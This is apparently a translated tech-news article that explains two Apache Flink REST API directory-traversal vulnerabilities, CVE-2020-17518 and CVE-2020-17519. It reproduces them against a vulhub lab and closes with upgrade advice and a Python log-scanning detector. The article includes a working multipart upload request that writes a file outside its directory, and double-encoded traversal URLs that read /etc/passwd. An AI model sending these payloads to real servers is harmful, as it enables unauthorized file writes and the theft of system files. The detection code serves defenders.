2025-01-16 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article describes the Apache Flink file vulnerabilities in detail, as a reference for interested readers.
Apache Flink file vulnerability
I. Description of vulnerabilities
The core of Apache Flink is a streaming dataflow execution engine that provides data distribution, data communication and fault tolerance for distributed computation over data streams. A REST API was introduced in Flink 1.5.1, but its implementation has several defects that lead to directory traversal.
CVE-2020-17518: file write vulnerability
Through the REST API, an attacker can modify an HTTP header so that the uploaded file is written to any location on the local file system (accessible by the Flink 1.5.1 process).
CVE-2020-17519: file read vulnerability
Apache Flink 1.11.0 allows an attacker to read any file on the JobManager local file system (accessible to the JobManager process) through the REST API of the JobManager process.
II. Affected versions
Apache Flink 1.5.1 ~ 1.11.2
III. Reproducing the vulnerabilities
Environment:
https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518
1. CVE-2020-17518: file writing vulnerability
POST /jars/upload HTTP/1.1
Host: IP:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 189

------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../tmp/sucess"

success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
Access the following URL to confirm that the file was written successfully:
http://ip+port/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsucess
2. CVE-2020-17519: file reading vulnerability
http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
Accessing this path returns the contents of passwd.
IV. Remediation
All users should upgrade to Flink 1.11.3 or 1.12.0. The download link is:
https://flink.apache.org/downloads.html
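A log check for the two request patterns shown above, as an added example that is not part of the original article or of Flink's own code. It assumes a reverse-proxy access log in combined format in front of the JobManager REST port; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

LOG_PREFIX = "/jobmanager/logs/"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
FILENAME_RE = re.compile(r'filename\s*=\s*"([^"]*)"', re.IGNORECASE)

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly, so %252f -> %2f -> / is seen as a separator."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_log_traversal(request_path):
    """True if a /jobmanager/logs/ request names a file outside the log directory."""
    path = request_path.split("?", 1)[0]
    if not path.lower().startswith(LOG_PREFIX):
        return False
    tail = fully_decode(path[len(LOG_PREFIX):]).replace("\\", "/")
    return ".." in tail.split("/")

def upload_filename_escapes(content_disposition):
    """True if a multipart filename carries directory components (upload case)."""
    m = FILENAME_RE.search(content_disposition)
    return m is not None and "/" in m.group(1).replace("\\", "/")

def scan_access_log(lines):
    """Return (line_number, path) for each traversal attempt on the log endpoint."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m and is_log_traversal(m.group(1)):
            hits.append((n, m.group(1)))
    return hits

# Constructed sample lines, not taken from a real system.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jan/2021:10:00:01 +0000] "GET /jobmanager/logs/flink-jobmanager.log HTTP/1.1" 200 5120',
    '10.0.0.9 - - [05/Jan/2021:10:00:07 +0000] "GET /jobmanager/logs/..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1310',
    '10.0.0.5 - - [05/Jan/2021:10:00:09 +0000] "GET /jobs/overview HTTP/1.1" 200 230',
]

if __name__ == "__main__":
    for n, path in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: traversal attempt: {path}")
    print(upload_filename_escapes('form-data; name="jarfile"; filename="../tmp/sucess"'))
```

Access logs rarely record multipart bodies, so the upload check is meant for a proxy or WAF hook that can see the Content-Disposition header of each part.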